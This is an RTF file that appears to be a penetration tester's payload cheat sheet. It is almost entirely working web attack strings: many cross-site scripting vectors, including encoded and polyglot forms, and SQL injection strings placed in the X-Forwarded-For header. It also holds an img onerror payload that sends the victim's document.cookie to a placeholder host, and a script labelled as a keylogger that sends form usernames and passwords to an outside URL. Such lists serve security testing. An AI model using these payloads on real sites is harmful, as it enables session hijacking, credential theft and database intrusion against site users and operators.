{\rtf1\ansi\ansicpg1252\cocoartf1404\cocoasubrtf470
{\fonttbl\f0\fswiss\fcharset0 Helvetica;\f1\fmodern\fcharset0 Courier;}
{\colortbl;\red255\green255\blue255;\red53\green53\blue53;\red220\green161\blue13;\red0\green0\blue233;
}
\paperw11900\paperh16840\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\deftab560
\pard\pardeftab560\slleading20\partightenfactor0

\f0\fs24 \cf0 #<img src=\'93random.gif\'94 onclick=alert(1)>\
#test%3Cscript%3Ealert%28%27test%27%29%3C/script%3E\
\
\
X-Forwarded-For: ' AND SLEEP(5) AND \'92test\'92=\'91test\
X_Forwarded_For: ' AND SLEEP(5) AND \'92test\'92=\'91test\
\pard\pardeftab560\slleading20\partightenfactor0
\cf2 X_FORWARDED_FOR :127.0.0.1' or 1=1#\
\pard\pardeftab560\slleading20\partightenfactor0
\cf0 \
<img onerror="document.location='http://URL.nl/cookie.php?cookie=' +escape(document.cookie);" src="a\'94/>\
\
<img src="1" onload="&#x70;&#x72;&#x6f;&#x6d;&#x70;&#x74;&#x28;&#x64;&#x6f;&#x63;&#x75;&#x6d;&#x65;&#x6e;&#x74;&#x2e;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x29;" />\
"><script>alert(/hodor/)</script>\
"></script><iframe/onload=alert(/TEST/)>\
"><img src=1 onerror=alert(/TEST/);>\
"><img src=\'93x\'94 onerror=alert('TEST')>\
"><script>prompt("TEST")</script>\
');prompt(/TEST/)//\
\\";alert(/TEST/);//\
<script>alert('TEST')</script> \
" autofocus onfocus=prompt(/TEST/) "\
<img onerror=alert(/TEST/) src=x>\
site:<script/xx>/**/alert(/TEST/)//\
\'91,TEST:confirm(/TEST/) ,//\
\pard\pardeftab560\slleading20\partightenfactor0

\f1 \cf0 ' onerror='alert(1)';\
\pard\pardeftab560\slleading20\partightenfactor0

\f0 \cf0 <script src={\field{\*\fldinst{HYPERLINK "https://test.org/1.js"}}{\fldrslt \cf3 \ul \ulc3 https://TEST.org/1.js}}>\
TEST" onmouseover="alert(\'91xss by HODOR\'92)\'94\
";location=location.hash)//#0=\{\};alert(0)\
 "><body onmouseover=alert('TEST\'92)>\
"><body ononmousedownclick=alert('TEST\'92)>\
\
<img src=\'93javascript:alert(1);\'94/>\
<script>alert(document.cookie)</script>\
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\
123<img src=1 onerror=alert(0)/>\
&lt;%script&gt;alert(\'91XSS\'92)&lt;%/script&gt;\
%3Cimg src=1 onerror=alert(1)%2f%3E\
</style></script><script>alert(1)</script>/\
<%a\
\pard\pardeftab560\slleading20\partightenfactor0
\cf4 \ul \ulc4 "><img src=x onerror=window.onerror=alert;throw/test/;//>\cf0 \ulnone \
\pard\pardeftab560\slleading20\partightenfactor0

\f1 \cf0 <script>\
	function haxhax()\{\
	alert(\'93Keylogger = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value);\
	XSSImage=new Image;\
	XSSImage.src="http://l33thaxorurl"+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";\
	\}\
</script>\
\pard\pardeftab560\slleading20\partightenfactor0

\f0 \cf0 \
TEST" onmouseover="{\field{\*\fldinst{HYPERLINK "http://google.com/"}}{\fldrslt \cf3 \ul \ulc3 http://google.com}}"\
"><script>document.location="{\field{\*\fldinst{HYPERLINK "http://google.com/"}}{\fldrslt \cf3 \ul \ulc3 http://google.com}}";</script>\
TEST" onmouseover="document.location.href='{\field{\*\fldinst{HYPERLINK "https://google.com/"}}{\fldrslt \cf3 \ul \ulc3 https://google.com}}'\'94\
\
text=test<script>var new_audio = document.createElement("audio");new_audio.src="http://media.dumpert.nl/mp3/27856e31_Tiroler_Rosi.mp3.mp3";new_audio.play();</script>\
\
POLYGLOTS\
\pard\pardeftab560\slleading20\partightenfactor0

\f1 \cf0 jaVasCript:/*-/*`/*\\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(2)//>\\x3e\
\
';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&\{\}\
}